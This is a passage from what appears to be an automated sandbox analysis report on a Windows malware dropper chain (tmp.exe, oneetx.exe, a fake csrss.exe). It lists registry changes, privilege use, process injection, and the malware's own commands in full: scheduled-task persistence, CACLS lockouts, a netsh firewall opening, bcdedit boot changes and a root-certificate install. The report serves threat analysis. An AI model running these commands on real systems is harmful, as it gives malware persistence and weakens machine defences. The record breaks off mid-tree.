Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-401 = "Arabic Daylight Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	3eef203fb515bda85f514e168abb5973.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time"	3eef203fb515bda85f514e168abb5973.exe

Modifies system certificate store 2 TTPs 7 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

csrss.exepatch.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

toolspub2.exe3eef203fb515bda85f514e168abb5973.exe3eef203fb515bda85f514e168abb5973.exeExplorer.EXEinjector.exeXandETC.exepowershell.exe

pid	process
1948	toolspub2.exe
1948	toolspub2.exe
1108	3eef203fb515bda85f514e168abb5973.exe
1036	3eef203fb515bda85f514e168abb5973.exe
1036	3eef203fb515bda85f514e168abb5973.exe
1036	3eef203fb515bda85f514e168abb5973.exe
1036	3eef203fb515bda85f514e168abb5973.exe
1036	3eef203fb515bda85f514e168abb5973.exe
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1556	injector.exe
1208	Explorer.EXE
1208	Explorer.EXE
1556	injector.exe
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1556	injector.exe
1208	Explorer.EXE
1208	Explorer.EXE
1556	injector.exe
1208	Explorer.EXE
1208	Explorer.EXE
1556	injector.exe
1208	Explorer.EXE
1208	Explorer.EXE
1208	Explorer.EXE
1556	injector.exe
1208	Explorer.EXE
1208	Explorer.EXE
1556	injector.exe
1208	Explorer.EXE
1208	Explorer.EXE
1500	XandETC.exe
1500	XandETC.exe
1556	injector.exe
1208	Explorer.EXE
1060	powershell.exe
1208	Explorer.EXE
1208	Explorer.EXE
1556	injector.exe
1208	Explorer.EXE
1208	Explorer.EXE
1556	injector.exe
1500	XandETC.exe
1500	XandETC.exe
1500	XandETC.exe
1500	XandETC.exe
1500	XandETC.exe
1500	XandETC.exe
1208	Explorer.EXE
1844
1208	Explorer.EXE
1556	injector.exe
1500	XandETC.exe
1500	XandETC.exe
1208	Explorer.EXE

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

464
464
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

toolspub2.exe

pid process

1948 toolspub2.exe

pid	process
464
464

Suspicious use of AdjustPrivilegeToken 45 IoCs

Processes:

3eef203fb515bda85f514e168abb5973.exetaskkill.execsrss.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exeExplorer.EXEpowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.exeWMIC.execonhost.exe

description	pid	process
Token: SeDebugPrivilege	1108	3eef203fb515bda85f514e168abb5973.exe
Token: SeImpersonatePrivilege	1108	3eef203fb515bda85f514e168abb5973.exe
Token: SeDebugPrivilege	1736	taskkill.exe
Token: SeSystemEnvironmentPrivilege	2024	csrss.exe
Token: SeDebugPrivilege	1060	powershell.exe
Token: SeShutdownPrivilege	1688	powercfg.exe
Token: SeDebugPrivilege	1844
Token: SeShutdownPrivilege	288	powercfg.exe
Token: SeShutdownPrivilege	1868	powercfg.exe
Token: SeShutdownPrivilege	1776	powercfg.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeShutdownPrivilege	1208	Explorer.EXE
Token: SeDebugPrivilege	1696	powershell.exe
Token: SeShutdownPrivilege	1500	powercfg.exe
Token: SeShutdownPrivilege	824	powercfg.exe
Token: SeShutdownPrivilege	684	powercfg.exe
Token: SeShutdownPrivilege	1440	powercfg.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1500	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1500	WMIC.exe
Token: SeSecurityPrivilege	1500	WMIC.exe
Token: SeTakeOwnershipPrivilege	1500	WMIC.exe
Token: SeLoadDriverPrivilege	1500	WMIC.exe
Token: SeSystemtimePrivilege	1500	WMIC.exe
Token: SeBackupPrivilege	1500	WMIC.exe
Token: SeRestorePrivilege	1500	WMIC.exe
Token: SeShutdownPrivilege	1500	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1500	WMIC.exe
Token: SeUndockPrivilege	1500	WMIC.exe
Token: SeManageVolumePrivilege	1500	WMIC.exe
Token: SeLockMemoryPrivilege	300	conhost.exe
Token: SeAssignPrimaryTokenPrivilege	1500	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1500	WMIC.exe
Token: SeSecurityPrivilege	1500	WMIC.exe
Token: SeTakeOwnershipPrivilege	1500	WMIC.exe
Token: SeLoadDriverPrivilege	1500	WMIC.exe
Token: SeSystemtimePrivilege	1500	WMIC.exe
Token: SeBackupPrivilege	1500	WMIC.exe
Token: SeRestorePrivilege	1500	WMIC.exe
Token: SeShutdownPrivilege	1500	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1500	WMIC.exe
Token: SeUndockPrivilege	1500	WMIC.exe
Token: SeManageVolumePrivilege	1500	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

oldplayer.exe

pid process

664 oldplayer.exe

pid	process
664	oldplayer.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

tmp.exeoldplayer.exeoneetx.execmd.exetoolspub2.exe

description	pid	process	target process
PID 1972 wrote to memory of 1976	1972	tmp.exe	aafg31.exe
PID 1972 wrote to memory of 1976	1972	tmp.exe	aafg31.exe
PID 1972 wrote to memory of 1976	1972	tmp.exe	aafg31.exe
PID 1972 wrote to memory of 1976	1972	tmp.exe	aafg31.exe
PID 1972 wrote to memory of 664	1972	tmp.exe	oldplayer.exe
PID 1972 wrote to memory of 664	1972	tmp.exe	oldplayer.exe
PID 1972 wrote to memory of 664	1972	tmp.exe	oldplayer.exe
PID 1972 wrote to memory of 664	1972	tmp.exe	oldplayer.exe
PID 1972 wrote to memory of 1500	1972	tmp.exe	XandETC.exe
PID 1972 wrote to memory of 1500	1972	tmp.exe	XandETC.exe
PID 1972 wrote to memory of 1500	1972	tmp.exe	XandETC.exe
PID 1972 wrote to memory of 1500	1972	tmp.exe	XandETC.exe
PID 664 wrote to memory of 1372	664	oldplayer.exe	oneetx.exe
PID 664 wrote to memory of 1372	664	oldplayer.exe	oneetx.exe
PID 664 wrote to memory of 1372	664	oldplayer.exe	oneetx.exe
PID 664 wrote to memory of 1372	664	oldplayer.exe	oneetx.exe
PID 1372 wrote to memory of 1616	1372	oneetx.exe	schtasks.exe
PID 1372 wrote to memory of 1616	1372	oneetx.exe	schtasks.exe
PID 1372 wrote to memory of 1616	1372	oneetx.exe	schtasks.exe
PID 1372 wrote to memory of 1616	1372	oneetx.exe	schtasks.exe
PID 1372 wrote to memory of 1556	1372	oneetx.exe	cmd.exe
PID 1372 wrote to memory of 1556	1372	oneetx.exe	cmd.exe
PID 1372 wrote to memory of 1556	1372	oneetx.exe	cmd.exe
PID 1372 wrote to memory of 1556	1372	oneetx.exe	cmd.exe
PID 1556 wrote to memory of 936	1556	cmd.exe	cmd.exe
PID 1556 wrote to memory of 936	1556	cmd.exe	cmd.exe
PID 1556 wrote to memory of 936	1556	cmd.exe	cmd.exe
PID 1556 wrote to memory of 936	1556	cmd.exe	cmd.exe
PID 1556 wrote to memory of 1104	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 1104	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 1104	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 1104	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 852	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 852	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 852	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 852	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 240	1556	cmd.exe	cmd.exe
PID 1556 wrote to memory of 240	1556	cmd.exe	cmd.exe
PID 1556 wrote to memory of 240	1556	cmd.exe	cmd.exe
PID 1556 wrote to memory of 240	1556	cmd.exe	cmd.exe
PID 1556 wrote to memory of 1776	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 1776	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 1776	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 1776	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 1292	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 1292	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 1292	1556	cmd.exe	cacls.exe
PID 1556 wrote to memory of 1292	1556	cmd.exe	cacls.exe
PID 1372 wrote to memory of 1108	1372	oneetx.exe	3eef203fb515bda85f514e168abb5973.exe
PID 1372 wrote to memory of 1108	1372	oneetx.exe	3eef203fb515bda85f514e168abb5973.exe
PID 1372 wrote to memory of 1108	1372	oneetx.exe	3eef203fb515bda85f514e168abb5973.exe
PID 1372 wrote to memory of 1108	1372	oneetx.exe	3eef203fb515bda85f514e168abb5973.exe
PID 1372 wrote to memory of 1860	1372	oneetx.exe	setup.exe
PID 1372 wrote to memory of 1860	1372	oneetx.exe	setup.exe
PID 1372 wrote to memory of 1860	1372	oneetx.exe	setup.exe
PID 1372 wrote to memory of 1860	1372	oneetx.exe	setup.exe
PID 1372 wrote to memory of 1860	1372	oneetx.exe	setup.exe
PID 1372 wrote to memory of 1860	1372	oneetx.exe	setup.exe
PID 1372 wrote to memory of 1860	1372	oneetx.exe	setup.exe
PID 1372 wrote to memory of 1668	1372	oneetx.exe	toolspub2.exe
PID 1372 wrote to memory of 1668	1372	oneetx.exe	toolspub2.exe
PID 1372 wrote to memory of 1668	1372	oneetx.exe	toolspub2.exe
PID 1372 wrote to memory of 1668	1372	oneetx.exe	toolspub2.exe
PID 1668 wrote to memory of 1948	1668	toolspub2.exe	toolspub2.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1208

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1972

C:\Users\Admin\AppData\Local\Temp\aafg31.exe
"C:\Users\Admin\AppData\Local\Temp\aafg31.exe"
3⤵
- Executes dropped EXE
PID:1976

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:664

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
"C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1372

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
5⤵
- Creates scheduled task(s)
PID:1616

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\207aa4515d" /P "Admin:N"&&CACLS "..\207aa4515d" /P "Admin:R" /E&&Exit
5⤵
- Suspicious use of WriteProcessMemory
PID:1556

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:936

C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:N"
6⤵
PID:1104

C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:N"
6⤵
PID:1776

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6⤵
PID:240

C:\Windows\SysWOW64\cacls.exe
CACLS "..\207aa4515d" /P "Admin:R" /E
6⤵
PID:1292

C:\Windows\SysWOW64\cacls.exe
CACLS "oneetx.exe" /P "Admin:R" /E
6⤵
PID:852

C:\Users\Admin\AppData\Local\Temp\1000002001\3eef203fb515bda85f514e168abb5973.exe
"C:\Users\Admin\AppData\Local\Temp\1000002001\3eef203fb515bda85f514e168abb5973.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1108

C:\Users\Admin\AppData\Local\Temp\1000002001\3eef203fb515bda85f514e168abb5973.exe
"C:\Users\Admin\AppData\Local\Temp\1000002001\3eef203fb515bda85f514e168abb5973.exe"
6⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1036

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
7⤵
PID:308

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
8⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
PID:1968

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
7⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2024

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
8⤵
- Creates scheduled task(s)
PID:1232

C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
8⤵
PID:516

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
PID:1764

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
9⤵
- Modifies boot configuration data using bcdedit
PID:1032

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
9⤵
- Modifies boot configuration data using bcdedit
PID:564

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
9⤵
- Modifies boot configuration data using bcdedit
PID:776

C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
9⤵
